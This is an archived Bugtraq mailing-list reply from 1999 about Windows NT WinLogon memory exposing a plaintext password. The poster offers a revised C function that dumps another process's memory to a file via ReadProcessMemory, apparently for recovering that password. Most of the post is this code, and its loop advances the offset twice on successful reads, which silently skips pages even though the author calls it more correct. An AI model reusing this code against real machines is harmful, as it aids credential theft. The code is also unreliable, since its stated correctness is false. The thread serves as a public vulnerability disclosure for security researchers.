Home page logo
/

bugtraq logo Bugtraq mailing list archives

Re: NT WinLogon VM contains plaintext password visible in admin m ode
From: rhorvick () GREATPLAINS COM (Robert Horvick)
Date: Thu, 16 Dec 1999 13:11:21 -0600


Actually there is a large bug in the code (well - it works just as well but
thousands of times faster and is more correct):

There is no reason to look beyond the application min and max address range
and no reason to read in anything other then page sizes (since a
VirtualAlloc will always round to at least the next largest page size).
This was how I should have written it to begin with but I got lazy :)

DWORD DumpMemory(HANDLE hProc, LPSTR szPath)
{
    LPSTR  lpOffset = 0;
    LPSTR  lpBuf = 0;
    DWORD  dwRead = 0;
    BOOL   bLastRead = FALSE;
    DWORD  dwDumpedBytes = 0;
    SYSTEM_INFO si = {0};
    FILE *f = 0;

    f = fopen(szPath, "wb");
    if(f)
    {   
        GetSystemInfo(&si);
        lpBuf = (LPSTR)malloc(si.dwPageSize + 1);
        for(lpOffset = si.lpMinimumApplicationAddress;
            (void*)lpOffset <= si.lpMaximumApplicationAddress;
            lpOffset += si.dwPageSize)
        {
            if(ReadProcessMemory( hProc,
                lpOffset,
                lpBuf,
                si.dwPageSize,
                &dwRead))
            {
                if(bLastRead)
                {
                    fwrite(lpBuf, 1, dwRead, f);
                }
                else
                {
                    fprintf(f, "\noffset %lx\n", lpOffset);
                    fwrite(lpBuf, 1, dwRead, f);
                    bLastRead = TRUE;
                }
                dwDumpedBytes += dwRead;
                lpOffset += si.dwPageSize;
            }
            else
            {
                bLastRead = FALSE;
            }
        }
    fclose(f);
    }
    else
    {
        fprintf(stderr, "Unable to open %s", szPath);
    }

    return dwDumpedBytes;
}

-----Original Message-----
From: Jorge_Miguel_Pinto () BancoBPI PT
[mailto:Jorge_Miguel_Pinto () BancoBPI PT]
Sent: Thursday, December 16, 1999 9:48 AM
To: rhorvick () GREATPLAINS COM
Cc: BUGTRAQ () SECURITYFOCUS COM
Subject: RE: NT WinLogon VM contains plaintext password visible in admin
m ode

I am sorry, but only read this today...
There is small bug in this code...

 <!     LPSTR   lpOffset = (void*)1;
 !>     LPSTR   lpOffset = (LPSTR)1;

This also doesn't work on Windows 2000 Professional, SRV and Adv Srv.

Greetings,

J.


  By Date           By Thread  

Current thread:
  • Re: NT WinLogon VM contains plaintext password visible in admin m ode Robert Horvick (Dec 16)
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]
AlienVault